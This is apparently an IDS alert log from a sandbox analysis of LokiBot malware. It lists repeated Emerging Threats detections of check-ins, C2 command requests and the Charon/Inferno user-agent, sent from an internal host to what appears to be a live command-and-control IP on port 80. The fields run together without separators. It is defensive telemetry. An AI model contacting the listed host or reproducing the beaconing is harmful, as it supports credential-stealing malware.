                                2025-01-11T01:43:01.944954+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84974994.156.177.4180TCP
                                2025-01-11T01:43:02.677370+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84974994.156.177.4180TCP
                                2025-01-11T01:43:02.677370+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84974994.156.177.4180TCP
                                2025-01-11T01:43:02.826098+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.84975094.156.177.4180TCP
                                2025-01-11T01:43:02.826098+01002025381ET MALWARE LokiBot Checkin1192.168.2.84975094.156.177.4180TCP
                                2025-01-11T01:43:02.826098+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.84975094.156.177.4180TCP
                                2025-01-11T01:43:03.548607+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.84975094.156.177.4180TCP
                                2025-01-11T01:43:03.548607+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.84975094.156.177.4180TCP
                                2025-01-11T01:43:03.707674+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85123094.156.177.4180TCP
                                2025-01-11T01:43:03.707674+01002025381ET MALWARE LokiBot Checkin1192.168.2.85123094.156.177.4180TCP
                                2025-01-11T01:43:03.707674+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85123094.156.177.4180TCP
                                2025-01-11T01:43:04.445387+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85123094.156.177.4180TCP
                                2025-01-11T01:43:04.445387+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85123094.156.177.4180TCP
                                2025-01-11T01:43:04.854034+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85123194.156.177.4180TCP
                                2025-01-11T01:43:04.854034+01002025381ET MALWARE LokiBot Checkin1192.168.2.85123194.156.177.4180TCP
                                2025-01-11T01:43:04.854034+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85123194.156.177.4180TCP
                                2025-01-11T01:43:05.582800+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85123194.156.177.4180TCP
                                2025-01-11T01:43:05.582800+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85123194.156.177.4180TCP
                                2025-01-11T01:43:05.736299+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85123294.156.177.4180TCP
                                2025-01-11T01:43:05.736299+01002025381ET MALWARE LokiBot Checkin1192.168.2.85123294.156.177.4180TCP
                                2025-01-11T01:43:05.736299+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85123294.156.177.4180TCP
                                2025-01-11T01:43:06.451735+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85123294.156.177.4180TCP
                                2025-01-11T01:43:06.451735+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85123294.156.177.4180TCP
                                2025-01-11T01:43:06.614277+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85123394.156.177.4180TCP
                                2025-01-11T01:43:06.614277+01002025381ET MALWARE LokiBot Checkin1192.168.2.85123394.156.177.4180TCP
                                2025-01-11T01:43:06.614277+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85123394.156.177.4180TCP
                                2025-01-11T01:43:07.362946+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85123394.156.177.4180TCP
                                2025-01-11T01:43:07.362946+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85123394.156.177.4180TCP
                                2025-01-11T01:43:07.773450+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85123494.156.177.4180TCP
                                2025-01-11T01:43:07.773450+01002025381ET MALWARE LokiBot Checkin1192.168.2.85123494.156.177.4180TCP
                                2025-01-11T01:43:07.773450+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85123494.156.177.4180TCP
                                2025-01-11T01:43:08.501687+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85123494.156.177.4180TCP
                                2025-01-11T01:43:08.501687+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85123494.156.177.4180TCP
                                2025-01-11T01:43:08.660221+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85123594.156.177.4180TCP
                                2025-01-11T01:43:08.660221+01002025381ET MALWARE LokiBot Checkin1192.168.2.85123594.156.177.4180TCP
                                2025-01-11T01:43:08.660221+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85123594.156.177.4180TCP
                                2025-01-11T01:43:09.359941+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85123594.156.177.4180TCP
                                2025-01-11T01:43:09.359941+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85123594.156.177.4180TCP
                                2025-01-11T01:43:09.514398+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85123694.156.177.4180TCP
                                2025-01-11T01:43:09.514398+01002025381ET MALWARE LokiBot Checkin1192.168.2.85123694.156.177.4180TCP
                                2025-01-11T01:43:09.514398+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85123694.156.177.4180TCP
                                2025-01-11T01:43:10.258088+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85123694.156.177.4180TCP
                                2025-01-11T01:43:10.258088+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85123694.156.177.4180TCP
                                2025-01-11T01:43:10.707200+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85123794.156.177.4180TCP
                                2025-01-11T01:43:10.707200+01002025381ET MALWARE LokiBot Checkin1192.168.2.85123794.156.177.4180TCP
                                2025-01-11T01:43:10.707200+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85123794.156.177.4180TCP
                                2025-01-11T01:43:11.447670+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85123794.156.177.4180TCP
                                2025-01-11T01:43:11.447670+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85123794.156.177.4180TCP
                                2025-01-11T01:43:11.607612+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85123894.156.177.4180TCP
                                2025-01-11T01:43:11.607612+01002025381ET MALWARE LokiBot Checkin1192.168.2.85123894.156.177.4180TCP
                                2025-01-11T01:43:11.607612+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85123894.156.177.4180TCP
                                2025-01-11T01:43:12.357348+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85123894.156.177.4180TCP
                                2025-01-11T01:43:12.357348+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85123894.156.177.4180TCP
                                2025-01-11T01:43:12.528797+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85123994.156.177.4180TCP
                                2025-01-11T01:43:12.528797+01002025381ET MALWARE LokiBot Checkin1192.168.2.85123994.156.177.4180TCP
                                2025-01-11T01:43:12.528797+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85123994.156.177.4180TCP
                                2025-01-11T01:43:13.250209+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85123994.156.177.4180TCP
                                2025-01-11T01:43:13.250209+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85123994.156.177.4180TCP
                                2025-01-11T01:43:13.572275+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85124094.156.177.4180TCP
                                2025-01-11T01:43:13.572275+01002025381ET MALWARE LokiBot Checkin1192.168.2.85124094.156.177.4180TCP
                                2025-01-11T01:43:13.572275+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85124094.156.177.4180TCP
                                2025-01-11T01:43:14.455819+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85124094.156.177.4180TCP
                                2025-01-11T01:43:14.455819+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85124094.156.177.4180TCP
                                2025-01-11T01:43:14.611221+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85124194.156.177.4180TCP
                                2025-01-11T01:43:14.611221+01002025381ET MALWARE LokiBot Checkin1192.168.2.85124194.156.177.4180TCP
                                2025-01-11T01:43:14.611221+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85124194.156.177.4180TCP
                                2025-01-11T01:43:15.317903+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85124194.156.177.4180TCP
                                2025-01-11T01:43:15.317903+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85124194.156.177.4180TCP
                                2025-01-11T01:43:15.469661+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85124294.156.177.4180TCP
                                2025-01-11T01:43:15.469661+01002025381ET MALWARE LokiBot Checkin1192.168.2.85124294.156.177.4180TCP
                                2025-01-11T01:43:15.469661+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85124294.156.177.4180TCP
                                2025-01-11T01:43:16.169920+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85124294.156.177.4180TCP
                                2025-01-11T01:43:16.169920+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85124294.156.177.4180TCP
                                2025-01-11T01:43:16.338867+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85124394.156.177.4180TCP
                                2025-01-11T01:43:16.338867+01002025381ET MALWARE LokiBot Checkin1192.168.2.85124394.156.177.4180TCP
                                2025-01-11T01:43:16.338867+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85124394.156.177.4180TCP
                                2025-01-11T01:43:17.034256+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85124394.156.177.4180TCP
                                2025-01-11T01:43:17.034256+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85124394.156.177.4180TCP
                                2025-01-11T01:43:17.186517+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85124494.156.177.4180TCP
                                2025-01-11T01:43:17.186517+01002025381ET MALWARE LokiBot Checkin1192.168.2.85124494.156.177.4180TCP
                                2025-01-11T01:43:17.186517+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85124494.156.177.4180TCP
                                2025-01-11T01:43:18.008658+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85124494.156.177.4180TCP
                                2025-01-11T01:43:18.008658+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85124494.156.177.4180TCP
                                2025-01-11T01:43:18.171449+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85124594.156.177.4180TCP
                                2025-01-11T01:43:18.171449+01002025381ET MALWARE LokiBot Checkin1192.168.2.85124594.156.177.4180TCP
                                2025-01-11T01:43:18.171449+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85124594.156.177.4180TCP
                                2025-01-11T01:43:18.899257+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85124594.156.177.4180TCP
                                2025-01-11T01:43:18.899257+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85124594.156.177.4180TCP
                                2025-01-11T01:43:19.049624+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85124694.156.177.4180TCP
                                2025-01-11T01:43:19.049624+01002025381ET MALWARE LokiBot Checkin1192.168.2.85124694.156.177.4180TCP
                                2025-01-11T01:43:19.049624+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85124694.156.177.4180TCP
                                2025-01-11T01:43:19.776146+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85124694.156.177.4180TCP
                                2025-01-11T01:43:19.776146+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85124694.156.177.4180TCP
                                2025-01-11T01:43:19.935376+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85124794.156.177.4180TCP
                                2025-01-11T01:43:19.935376+01002025381ET MALWARE LokiBot Checkin1192.168.2.85124794.156.177.4180TCP
                                2025-01-11T01:43:19.935376+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85124794.156.177.4180TCP
                                2025-01-11T01:43:20.675015+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85124794.156.177.4180TCP
                                2025-01-11T01:43:20.675015+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85124794.156.177.4180TCP
                                2025-01-11T01:43:20.826439+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85124894.156.177.4180TCP
                                2025-01-11T01:43:20.826439+01002025381ET MALWARE LokiBot Checkin1192.168.2.85124894.156.177.4180TCP
                                2025-01-11T01:43:20.826439+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85124894.156.177.4180TCP
                                2025-01-11T01:43:21.529416+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85124894.156.177.4180TCP
                                2025-01-11T01:43:21.529416+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85124894.156.177.4180TCP
                                2025-01-11T01:43:21.716741+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85124994.156.177.4180TCP
                                2025-01-11T01:43:21.716741+01002025381ET MALWARE LokiBot Checkin1192.168.2.85124994.156.177.4180TCP
                                2025-01-11T01:43:21.716741+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85124994.156.177.4180TCP
                                2025-01-11T01:43:22.419117+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85124994.156.177.4180TCP
                                2025-01-11T01:43:22.419117+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85124994.156.177.4180TCP
                                2025-01-11T01:43:22.578331+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85125094.156.177.4180TCP
                                2025-01-11T01:43:22.578331+01002025381ET MALWARE LokiBot Checkin1192.168.2.85125094.156.177.4180TCP
                                2025-01-11T01:43:22.578331+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85125094.156.177.4180TCP
                                2025-01-11T01:43:23.300654+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85125094.156.177.4180TCP
                                2025-01-11T01:43:23.300654+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85125094.156.177.4180TCP
                                2025-01-11T01:43:23.456554+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85125194.156.177.4180TCP
                                2025-01-11T01:43:23.456554+01002025381ET MALWARE LokiBot Checkin1192.168.2.85125194.156.177.4180TCP
                                2025-01-11T01:43:23.456554+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85125194.156.177.4180TCP
                                2025-01-11T01:43:24.173563+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85125194.156.177.4180TCP
                                2025-01-11T01:43:24.173563+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85125194.156.177.4180TCP
                                2025-01-11T01:43:24.327063+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85125294.156.177.4180TCP
                                2025-01-11T01:43:24.327063+01002025381ET MALWARE LokiBot Checkin1192.168.2.85125294.156.177.4180TCP
                                2025-01-11T01:43:24.327063+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85125294.156.177.4180TCP
                                2025-01-11T01:43:25.031983+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85125294.156.177.4180TCP
                                2025-01-11T01:43:25.031983+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85125294.156.177.4180TCP
                                2025-01-11T01:43:25.184735+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85125394.156.177.4180TCP
                                2025-01-11T01:43:25.184735+01002025381ET MALWARE LokiBot Checkin1192.168.2.85125394.156.177.4180TCP
                                2025-01-11T01:43:25.184735+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85125394.156.177.4180TCP
                                2025-01-11T01:43:25.949805+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85125394.156.177.4180TCP
                                2025-01-11T01:43:25.949805+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85125394.156.177.4180TCP
                                2025-01-11T01:43:26.109254+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85125494.156.177.4180TCP
                                2025-01-11T01:43:26.109254+01002025381ET MALWARE LokiBot Checkin1192.168.2.85125494.156.177.4180TCP
                                2025-01-11T01:43:26.109254+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85125494.156.177.4180TCP
                                2025-01-11T01:43:26.814642+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85125494.156.177.4180TCP
                                2025-01-11T01:43:26.814642+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85125494.156.177.4180TCP
                                2025-01-11T01:43:26.979791+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85125594.156.177.4180TCP
                                2025-01-11T01:43:26.979791+01002025381ET MALWARE LokiBot Checkin1192.168.2.85125594.156.177.4180TCP
                                2025-01-11T01:43:26.979791+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85125594.156.177.4180TCP
                                2025-01-11T01:43:27.681023+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85125594.156.177.4180TCP
                                2025-01-11T01:43:27.681023+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85125594.156.177.4180TCP
                                2025-01-11T01:43:27.847811+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85125694.156.177.4180TCP
                                2025-01-11T01:43:27.847811+01002025381ET MALWARE LokiBot Checkin1192.168.2.85125694.156.177.4180TCP
                                2025-01-11T01:43:27.847811+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85125694.156.177.4180TCP
                                2025-01-11T01:43:28.609487+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85125694.156.177.4180TCP
                                2025-01-11T01:43:28.609487+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85125694.156.177.4180TCP
                                2025-01-11T01:43:28.764296+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85125794.156.177.4180TCP
                                2025-01-11T01:43:28.764296+01002025381ET MALWARE LokiBot Checkin1192.168.2.85125794.156.177.4180TCP
                                2025-01-11T01:43:28.764296+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85125794.156.177.4180TCP
                                2025-01-11T01:43:29.581279+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85125794.156.177.4180TCP
                                2025-01-11T01:43:29.581279+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85125794.156.177.4180TCP
                                2025-01-11T01:43:29.742691+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85125894.156.177.4180TCP
                                2025-01-11T01:43:29.742691+01002025381ET MALWARE LokiBot Checkin1192.168.2.85125894.156.177.4180TCP
                                2025-01-11T01:43:29.742691+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85125894.156.177.4180TCP
                                2025-01-11T01:43:30.500137+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85125894.156.177.4180TCP
                                2025-01-11T01:43:30.500137+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85125894.156.177.4180TCP
                                2025-01-11T01:43:30.877186+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85125994.156.177.4180TCP
                                2025-01-11T01:43:30.877186+01002025381ET MALWARE LokiBot Checkin1192.168.2.85125994.156.177.4180TCP
                                2025-01-11T01:43:30.877186+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85125994.156.177.4180TCP
                                2025-01-11T01:43:31.580940+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85125994.156.177.4180TCP
                                2025-01-11T01:43:31.580940+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85125994.156.177.4180TCP
                                2025-01-11T01:43:31.748335+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85126094.156.177.4180TCP
                                2025-01-11T01:43:31.748335+01002025381ET MALWARE LokiBot Checkin1192.168.2.85126094.156.177.4180TCP
                                2025-01-11T01:43:31.748335+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85126094.156.177.4180TCP
                                2025-01-11T01:43:32.450949+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85126094.156.177.4180TCP
                                2025-01-11T01:43:32.450949+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85126094.156.177.4180TCP
                                2025-01-11T01:43:32.607831+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85126194.156.177.4180TCP
                                2025-01-11T01:43:32.607831+01002025381ET MALWARE LokiBot Checkin1192.168.2.85126194.156.177.4180TCP
                                2025-01-11T01:43:32.607831+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85126194.156.177.4180TCP
                                2025-01-11T01:43:33.314839+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85126194.156.177.4180TCP
                                2025-01-11T01:43:33.314839+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85126194.156.177.4180TCP
                                2025-01-11T01:43:33.949545+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85126294.156.177.4180TCP
                                2025-01-11T01:43:33.949545+01002025381ET MALWARE LokiBot Checkin1192.168.2.85126294.156.177.4180TCP
                                2025-01-11T01:43:33.949545+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85126294.156.177.4180TCP
                                2025-01-11T01:43:34.659023+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85126294.156.177.4180TCP
                                2025-01-11T01:43:34.659023+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85126294.156.177.4180TCP
                                2025-01-11T01:43:34.814322+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85126394.156.177.4180TCP
                                2025-01-11T01:43:34.814322+01002025381ET MALWARE LokiBot Checkin1192.168.2.85126394.156.177.4180TCP
                                2025-01-11T01:43:34.814322+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85126394.156.177.4180TCP
                                2025-01-11T01:43:35.532934+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85126394.156.177.4180TCP
                                2025-01-11T01:43:35.532934+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85126394.156.177.4180TCP
                                2025-01-11T01:43:35.685742+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85126494.156.177.4180TCP
                                2025-01-11T01:43:35.685742+01002025381ET MALWARE LokiBot Checkin1192.168.2.85126494.156.177.4180TCP
                                2025-01-11T01:43:35.685742+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85126494.156.177.4180TCP
                                2025-01-11T01:43:36.403855+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85126494.156.177.4180TCP
                                2025-01-11T01:43:36.403855+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85126494.156.177.4180TCP
                                2025-01-11T01:43:36.565085+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85126694.156.177.4180TCP
                                2025-01-11T01:43:36.565085+01002025381ET MALWARE LokiBot Checkin1192.168.2.85126694.156.177.4180TCP
                                2025-01-11T01:43:36.565085+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85126694.156.177.4180TCP
                                2025-01-11T01:43:37.315630+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85126694.156.177.4180TCP
                                2025-01-11T01:43:37.315630+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85126694.156.177.4180TCP
                                2025-01-11T01:43:37.485335+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85127394.156.177.4180TCP
                                2025-01-11T01:43:37.485335+01002025381ET MALWARE LokiBot Checkin1192.168.2.85127394.156.177.4180TCP
                                2025-01-11T01:43:37.485335+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85127394.156.177.4180TCP
                                2025-01-11T01:43:38.226839+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85127394.156.177.4180TCP
                                2025-01-11T01:43:38.226839+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85127394.156.177.4180TCP
                                2025-01-11T01:43:38.387023+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85128094.156.177.4180TCP
                                2025-01-11T01:43:38.387023+01002025381ET MALWARE LokiBot Checkin1192.168.2.85128094.156.177.4180TCP
                                2025-01-11T01:43:38.387023+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85128094.156.177.4180TCP
                                2025-01-11T01:43:39.084674+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85128094.156.177.4180TCP
                                2025-01-11T01:43:39.084674+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85128094.156.177.4180TCP
                                2025-01-11T01:43:39.246713+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85128994.156.177.4180TCP
                                2025-01-11T01:43:39.246713+01002025381ET MALWARE LokiBot Checkin1192.168.2.85128994.156.177.4180TCP
                                2025-01-11T01:43:39.246713+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85128994.156.177.4180TCP
                                2025-01-11T01:43:39.967691+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85128994.156.177.4180TCP
                                2025-01-11T01:43:39.967691+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85128994.156.177.4180TCP
                                2025-01-11T01:43:40.188662+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85129794.156.177.4180TCP
                                2025-01-11T01:43:40.188662+01002025381ET MALWARE LokiBot Checkin1192.168.2.85129794.156.177.4180TCP
                                2025-01-11T01:43:40.188662+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85129794.156.177.4180TCP
                                2025-01-11T01:43:40.906466+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85129794.156.177.4180TCP
                                2025-01-11T01:43:40.906466+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85129794.156.177.4180TCP
                                2025-01-11T01:43:41.063388+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85130394.156.177.4180TCP
                                2025-01-11T01:43:41.063388+01002025381ET MALWARE LokiBot Checkin1192.168.2.85130394.156.177.4180TCP
                                2025-01-11T01:43:41.063388+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85130394.156.177.4180TCP
                                2025-01-11T01:43:41.803250+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85130394.156.177.4180TCP
                                2025-01-11T01:43:41.803250+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85130394.156.177.4180TCP
                                2025-01-11T01:43:42.036690+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85130994.156.177.4180TCP
                                2025-01-11T01:43:42.036690+01002025381ET MALWARE LokiBot Checkin1192.168.2.85130994.156.177.4180TCP
                                2025-01-11T01:43:42.036690+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85130994.156.177.4180TCP
                                2025-01-11T01:43:42.794250+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85130994.156.177.4180TCP
                                2025-01-11T01:43:42.794250+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85130994.156.177.4180TCP
                                2025-01-11T01:43:42.952923+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85131594.156.177.4180TCP
                                2025-01-11T01:43:42.952923+01002025381ET MALWARE LokiBot Checkin1192.168.2.85131594.156.177.4180TCP
                                2025-01-11T01:43:42.952923+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85131594.156.177.4180TCP
                                2025-01-11T01:43:43.674930+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85131594.156.177.4180TCP
                                2025-01-11T01:43:43.674930+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85131594.156.177.4180TCP
                                2025-01-11T01:43:43.902308+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85132194.156.177.4180TCP
                                2025-01-11T01:43:43.902308+01002025381ET MALWARE LokiBot Checkin1192.168.2.85132194.156.177.4180TCP
                                2025-01-11T01:43:43.902308+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85132194.156.177.4180TCP
                                2025-01-11T01:43:44.614068+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85132194.156.177.4180TCP
                                2025-01-11T01:43:44.614068+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85132194.156.177.4180TCP
